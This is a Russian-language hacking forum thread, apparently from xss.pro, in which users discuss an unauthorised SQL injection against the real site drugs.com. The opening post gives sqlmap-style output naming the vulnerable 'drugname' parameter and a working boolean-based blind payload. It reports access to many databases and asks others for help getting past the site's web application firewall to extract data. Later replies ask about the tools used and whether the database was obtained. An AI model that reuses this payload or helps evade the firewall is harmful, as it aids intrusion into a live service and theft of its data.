[SQLi] drugs.com

Xrenovi4 · 27.09.2019

У вас должно быть более 10 сообщений для просмотра скрытого контента.

Nfl - Pill Identifier | Drugs.com

Drug Identifier Results for "nfl". Search by imprint, shape, color or drug name.

www.drugs.com

Parameter: drugname (GET)
Type: boolean-based blind
Title: MySQL OR boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (bool*int)
Payload: drugname=-8360' OR (6959=6959)*8423-- vyEr
---
back-end DBMS: MySQL unknown

1241 дб, но получить имена не вышло, ответы все убивает waf

Если кто крутанет, был бы рад услышать как решили проблему с именами

QwEQw3RtyY · 28.09.2019

Хренович, это тулзой нашел?

https://xss.pro/threads/30638/

или свои методы?
Просто тут на грани выбора, подмоги старичек.

Xrenovi4 · 28.09.2019

QwEQw3RtyY сказал(а):

Хренович, это тулзой нашел?

https://xss.pro/threads/30638/
или свои методы?
Просто тут на грани выбора, подмоги старичек.

Нашел то да, но крутил уже потом мапом
На общих настройках до бд не добраться, сайт спецефичненький

redeyex · 01.10.2019

Бд получил или в процессе?

[SQLi] drugs.com

Xrenovi4

Скидди

Nfl - Pill Identifier | Drugs.com

QwEQw3RtyY

(L2) cache

Xrenovi4

Скидди

redeyex

(L3) cache